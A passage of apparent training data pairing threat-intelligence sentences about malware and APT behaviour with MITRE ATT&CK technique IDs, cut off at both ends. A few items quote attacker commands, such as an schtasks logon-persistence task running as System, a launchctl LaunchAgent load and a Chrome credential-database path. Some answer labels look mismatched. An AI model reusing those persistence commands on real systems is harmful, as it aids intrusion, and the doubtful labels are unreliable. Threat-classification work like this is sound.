T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi takes screenshots of windows of interest.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses a driver registered as a boot start service as the main load-point.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can open a reverse shell on the system to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MirageFox has a function for decrypting data containing C2 configuration information.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork ran a reverse shell with Meterpreter.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has used SQL to execute JavaScript and VB scripts on the host system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal decodes strings in the malware using XOR and RC4.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings Domain Policy Modification for their benefit.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, malware may execute share modules to load additional components or features.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can add itself to the Registry as a startup program to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL disables the Windows firewall before binding to a port.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to enumerate the infected system's user name.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner has obfuscated various scripts and encrypted DMG files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information from the victim about installed anti-virus software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy has a command to perform screen grabbing.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke uses HTTP and HTTPS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via Phishing for Information.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs copies itself over network shares to move laterally on a victim network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can encrypt C2 traffic using XOR.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs operating system information discovery using systeminfo.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into process via Extra Window Memory in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Komplex trojan creates a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist with launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet collects the time and date of a system when it is infected.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,McAfee detects these threats as: RDN/Generic Exploit RDN/Generic.dx Generic PWS.y Generic.hbg Exploit-CVE2018-4878 McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used compromised domains to host links targeted to specific phishing victims.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IPC is typically used by processes to share data, communicate with each other, or synchronize execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can use HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy can download and execute remote files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These connections may be direct or may include trying to connect through others.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket or change an account's password as noted in Account Manipulation.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has sent spearphishing attachments attempting to get a user to open them.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Regin malware platform uses Extended Attributes to store encrypted executables.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The number of default cached credentials varies and can be altered per system.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSOURCE uses DNS TXT records for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has conducted watering holes schemes to gain initial access to victims.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHA256 Filename PowerShell Filename Variant 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63 Technical Services.exe Office365DCOMCheck.ps1 Bat2exe d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520 tafahom.exe, Sales Modification.exe SystemDiskClean.ps1 .NET Table 1### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie attempts to detect several anti-virus products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover takes screenshots of the compromised system's desktop and saves them to C:\system\screenshot.bmp for exfiltration every 60 minutes.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dust Storm has used Android backdoors capable of exfiltrating specific files directly from the infected devices.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also gathers registered mail, browser, and instant messaging clients from the Registry.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The decoy file, doc.rtf, contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP%### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti has used API calls during execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has encrypted it's main payload using 3DES.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A PowerShell profile is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used basE91 encoding, along with encryption, for C2 communication.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD searches for interesting files on the local system and removable media.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used the Get-ManagementRoleAssignment PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These databases can be stored as files on disk.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In infrastructure-as-a-service environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once they are deleted by the attackers’ code, there is nothing left to be forensically recovered.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Configuration Config.ini is the file where the malware stores its encrypted configuration data### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot searches for certain Registry keys to be configured before executing the payload.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL communicates on ports 443 and 8000 with a FakeTLS method.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used decoy documents to load malicious remote payloads via HTTP.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Recent versions of Cherry Picker delete files and registry keys created by the malware.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya determines if specific antivirus programs are running on an infected host machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can capture a screenshot from a victim.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Janicab captured audio and sent it out to a C2 server.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can use BITS jobs to download its malicious payload.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to use removable drives to spread through compromised networks.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search for common password storage locations to obtain user credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can delete files to cover tracks.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used the tasklist command to search for one of its backdoors.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers data from the local victim system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has created a hidden file in the Startup folder of the current user.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT’s Java payload is encrypted with AES.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install SSL/TLS certificates that can be used during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used Powershell to download malicious payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may utilize native support for virtualization or drop the necessary files to run a virtual instance .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has been packed with NSIS.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra created Dropbox accounts for their operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* **Import address table hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy gathers the current time zone and date information from the system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has gathered a process list by using Tasklist.exe.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using a golden ticket, adversaries are then able to request ticket granting service tickets, which enable access to specific resources.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 extracted files from compromised networks.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT3 downloader creates persistence by creating the following scheduled task: schtasks /create /tn ""mysc"" /tr C:\Users\Public\test.exe /sc ONLOGON /ru ""System"".### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type runs the command net start on a victim.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to steal data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse system services or daemons to execute commands or programs.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Finally, Reaver.v1 will execute the ‘~WUpdate.lnk’ file in a new process, thus loading the recently dropped malicious CPL file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has configured persistence to the Registry ket HKCU\Software\Microsoft\Windows\CurrentVersion\Run, Spotify =% APPDATA%\Spotify\Spotify.exe and used .LNK files in the startup folder to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork dumped the login data database from \AppData\Local\Google\Chrome\User Data\Default\Login Data.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore uses the curl -s -L -o command to exfiltrate archived data to a URL.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used a delivered trojan to download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can execute via rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin contains a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are several well-known vulnerabilities that exist in common services such as SMB and RDP as well as applications that may be used within internal networks such as MySQL and web server services.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,pngdowner deletes content from C2 communications that was saved to the user's temporary directory.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot can download and execute a payload onto a compromised system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron has used filenames associated with Exchange and Outlook for binary and configuration files, such as winmail.dat.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of NtSetInformationSymbolicLink.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of performing screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When dropped onto a second victim, it also enumerates drives connected to the system.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper will attempt to enumerate the username of the victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has a function to use the OpenClipboard wrapper.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also provide a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has exfiltrated information gathered from the infected system to the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Group policy allows for centralized management of user and computer settings in Active Directory .### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Programs with direct access may read and write files directly from the drive by analyzing file system data structures.### Assistant: T1006: Direct Volume Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has the capability to stop antivirus services and disable Windows Defender.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to remote services may be used as a redundant or persistent access mechanism during an operation.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of PowerShell to download additional tools### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has registered a Windows shell script under the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can search for processes with antivirus and antimalware product names.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can download additional payloads from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has created new email accounts for targeting efforts.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used procdump to dump the LSASS process memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has named malicious files update.exe and loaded them into the compromise host's “Public” folder.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The different stages will likely be hosted separately with no overlapping infrastructure.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(To bypass UAC) configurable setting for the process to abuse Other than these, new coding algorithm has been introduced### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage can execute arbitrary commands with PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform software packing or virtual machine software protection to conceal their code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can write encrypted JSON configuration files to the 